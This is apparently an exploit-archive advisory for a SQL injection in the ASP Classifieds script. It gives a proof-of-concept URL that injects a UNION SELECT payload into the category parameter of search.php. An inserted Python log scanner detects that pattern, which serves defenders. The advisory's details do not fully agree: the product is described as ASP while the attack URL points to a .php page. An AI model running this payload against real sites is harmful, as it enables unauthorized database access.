ASP Classifieds - SQL Injection



EKU-ID: 24336
CVE: OSVDB-80580; CVE-2007-2675; OSVDB-35597
Author: r45c4l
Published: 2012-03-17
Verified: Not Verified


# Exploit Title: ASP Classifieds Sql Injection
# Date: 17/03/2012
# Author: r45c4l
# Email: infosecpirate@gmail.com
# Script url: http://preproject.com/pclasp/home/default.asp
# Version: N/A
# CVE : ()

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

Product Description :

ASP Classifieds is one of the most customizable classified ad programs
that exist for ASP and Access. Unlimited images, unlimited categories
and much more make it perfect for anyone from those who want to set up
a used stamps classifieds site to those wanting to show and sell real estate.


Product Cost : 58$



=======================Exploit====================================
                      ---ICW---



[ EXPL0!T ]

SQL Injection
p0c -
http://SERVER/classi/search.php?category=[SQli]

PoC -

http://SERVER/classi/search.php?category=-1+union+all+select+version()--

[Note: Tested on demo website]

d0rk - use your brain ;)
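
A defender-side check for the request pattern in the PoC above, as an added example that is not part of the original advisory: it scans web-server access log lines for requests to search.php whose category value is not a plain integer. The log lines are constructed, and the integer-id rule, the combined log format and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not from the advisory); IPs are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.7 - - [17/Mar/2012:10:01:02 +0000] "GET /classi/search.php?category=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [17/Mar/2012:10:04:40 +0000] "GET /classi/search.php?category=-1+union+all+select+version()-- HTTP/1.1" 200 734',
    '203.0.113.9 - - [17/Mar/2012:10:04:51 +0000] "GET /classi/search.php?category=-1%20UNION%20ALL%20SELECT%20version()-- HTTP/1.1" 200 734',
    '198.51.100.4 - - [17/Mar/2012:10:09:13 +0000] "GET /classi/search.php?category=cars HTTP/1.1" 200 312',
    '198.51.100.4 - - [17/Mar/2012:10:09:20 +0000] "GET /classi/view.php?id=5 HTTP/1.1" 200 2048',
]

# Assumption: a legitimate `category` value is a short non-negative integer id.
INT_ID = re.compile(r"[0-9]{1,9}")
SQL_HINT = re.compile(r"\b(union|select)\b|--|/\*|'", re.I)
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def classify(value):
    """Return None for a plain integer id, otherwise a reason string."""
    if INT_ID.fullmatch(value):
        return None
    return "sql-syntax" if SQL_HINT.search(value) else "non-integer"


def scan(lines, path_suffix="/search.php", param="category"):
    """Return (client, decoded value, reason) for each suspicious request."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue  # not a request line we understand
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith(path_suffix):
            continue
        # parse_qs decodes %xx and '+', so encoded variants are compared decoded.
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            reason = classify(value)
            if reason:
                hits.append((client, value, reason))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The same integer-only rule belongs in the application itself, alongside a parameterized query; the log scan only shows which requests have already failed it.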

===========================================================================
Greetz to : Beenu Arora, Godwin Austin, Eberly, b0nd, the_empty_, micr0,
Hoody, sam

All members of ICW, AH and darkc0de, and all Indian Hackers



Special Greetz to : b4ltazar and s1nner_01


=== End () ====